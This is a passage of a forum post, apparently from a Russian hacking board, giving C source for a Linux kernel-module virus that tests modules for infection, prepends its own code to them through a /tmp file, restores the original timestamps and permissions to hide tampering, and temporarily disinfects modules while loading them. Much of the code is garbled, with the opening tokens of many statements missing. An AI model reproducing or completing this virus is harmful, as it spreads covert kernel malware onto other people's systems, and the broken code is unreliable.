int fd = 0 ;
struct file * file ;
DPRINTK ( "in is_infected: filename = %s\n" , filename );
BEGIN_KMEM
= open ( filename , O_RDONLY , 0 );
END_KMEM
if ( fd <= 0 )
1 ;
file = current -> files -> fd [ fd ]) == NULL )
2 ;
file -> f_pos = MODLEN + 1 ;
DPRINTK ( "in is_infected: file->f_pos = %d\n" , file -> f_pos );
BEGIN_KMEM
-> f_op -> read ( file -> f_inode , file , det , 3 );
close ( fd );
END_KMEM
( "in is_infected: det = %s\n" , det );
strcmp ( det , "ELF" ) == 0 )
1 ;
0 ;
/* copy the host-module to tmp, write VirCode to
int infectfile ( char * filename )
char * tmp = "/tmp/t000" ;
int in = 0 , out = 0 ;
struct file * file1 , * file2 ;
BEGIN_KMEM
= open ( filename , O_RDONLY , 0640 );
out = open ( tmp , O_RDWR | O_TRUNC | O_CREAT , 0640 );
END_KMEM
( "in infectfile: in = %d out = %d\n" , in , out );
in <= 0 || out <= 0 )
1 ;
file1 = current -> files -> fd [ in ];
file2 = current -> files -> fd [ out ];
file1 || ! file2 )
1 ;
/* save hostcode */
cp ( file1 , file2 );
BEGIN_KMEM
-> f_pos = 0 ;
file2 -> f_pos = 0 ;
/* write Vircode [from mem] */
DPRINTK ( "in infetcfile: filenanme = %s\n" , filename );
file1 -> f_op -> write ( file1 -> f_inode , file1 , VirCode , MODLEN );
/* append hostcode */
cp ( file2 , file1 );
close ( in );
close ( out );
unlink ( tmp );
END_KMEM
return 0 ;
int disinfect ( char * filename )
char * tmp = "/tmp/t000" ;
int in = 0 , out = 0 ;
struct file * file1 , * file2 ;
BEGIN_KMEM
= open ( filename , O_RDONLY , 0640 );
out = open ( tmp , O_RDWR | O_TRUNC | O_CREAT , 0640 );
END_KMEM
( "in disinfect: in = %d out = %d\n" , in , out );
in <= 0 || out <= 0 )
1 ;
file1 = current -> files -> fd [ in ];
file2 = current -> files -> fd [ out ];
file1 || ! file2 )
1 ;
/* save hostcode */
cp ( file1 , file2 );
BEGIN_KMEM
( in );
DPRINTK ( "in disinfect: filename = %s\n" , filename );
unlink ( filename );
in = open ( filename , O_RDWR | O_CREAT , 0640 );
END_KMEM
if ( in <= 0 )
1 ;
file1 = current -> files -> fd [ in ];
file1 )
1 ;
file2 -> f_pos = MODLEN ;
cp ( file2 , file1 );
BEGIN_KMEM
( in );
close ( out );
unlink ( tmp );
END_KMEM
return 0 ;
/* a simple copy routine, that expects the file struct pointer
int cp ( struct file * file1 , struct file * file2 )
int in = 0 , out = 0 , r = 0 ;
char * buf ;
buf = ( char *) vmalloc ( 10000 )) == NULL )
1 ;
DPRINTK ( "in cp: f_pos = %d\n" , file1 -> f_pos );
BEGIN_KMEM
while (( r = file1 -> f_op -> read ( file1 -> f_inode , file1 , buf , 10000 )) > 0 )
file2 -> f_op -> write ( file2 -> f_inode , file2 , buf , r );
file2 -> f_inode -> i_mode = file1 -> f_inode -> i_mode ;
file2 -> f_inode -> i_atime = file1 -> f_inode -> i_atime ;
file2 -> f_inode -> i_mtime = file1 -> f_inode -> i_mtime ;
file2 -> f_inode -> i_ctime = file1 -> f_inode -> i_ctime ;
END_KMEM
( buf );
0 ;
/* Is that simple: we disinfect the module [hide 'n seek]
int load_real_mod ( char * path_name , char * name )
int r = 0 , i = 0 ;
struct file * file1 , * file2 ;
int in = 0 , out = 0 ;
DPRINTK ( "in load_real_mod name = %s\n" , path_name );
VirCode )
vfree ( VirCode );
VirCode = vmalloc ( MODLEN );
VirCode )
1 ;
BEGIN_KMEM
= open ( path_name , O_RDONLY , 0640 );
END_KMEM
if ( in <= 0 )
1 ;
file1 = current -> files -> fd [ in ];
file1 )
1 ;
/* read Vircode [into mem] */
BEGIN_KMEM
-> f_op -> read ( file1 -> f_inode , file1 , VirCode , MODLEN );
close ( in );
END_KMEM
( path_name );
r = request_module ( name );
DPRINTK ( "in load_real_mod: request_module = %d\n" , r );
0 ;
char * get_mod_name ( char * mod )
int fd = 0 , i = 0 ;
char * modname = NULL ;
modname )
modname = vmalloc ( MAXPATH + 60 + 2 );
modname )
NULL ;
BEGIN_KMEM
for ( i = 0 ; ( default_path [ i ] && ( strstr ( mod , "/" ) == NULL )); i ++) {
memset ( modname , 0 , MAXPATH + 60 + 2 );
modname = strcpy ( modname , default_path [ i ]);
modname = strcat ( modname , "/" );
modname = strcat ( modname , mod );
fd = open ( modname , O_RDONLY , 0640 )) > 0 )
close ( fd );
END_KMEM
if (! default_path [ i ])
NULL ;
modname ;
__________________
Quod me nutrit me destruit
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
Опции темы
Опции просмотра
Линейный вид
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения
HTML код Выкл.
Друзья форума :
kidala.info ,
hack-sell.com ,
Brute.Name ,
Секреты ВКонтакте ,
EXPHack.org ,
База IP диапазонов Ваша ссылка может быть здесь если вашему сайту/форуму более 3х месяцев. ICQ 22222208
FreeBSD вирусы
Линейный вид
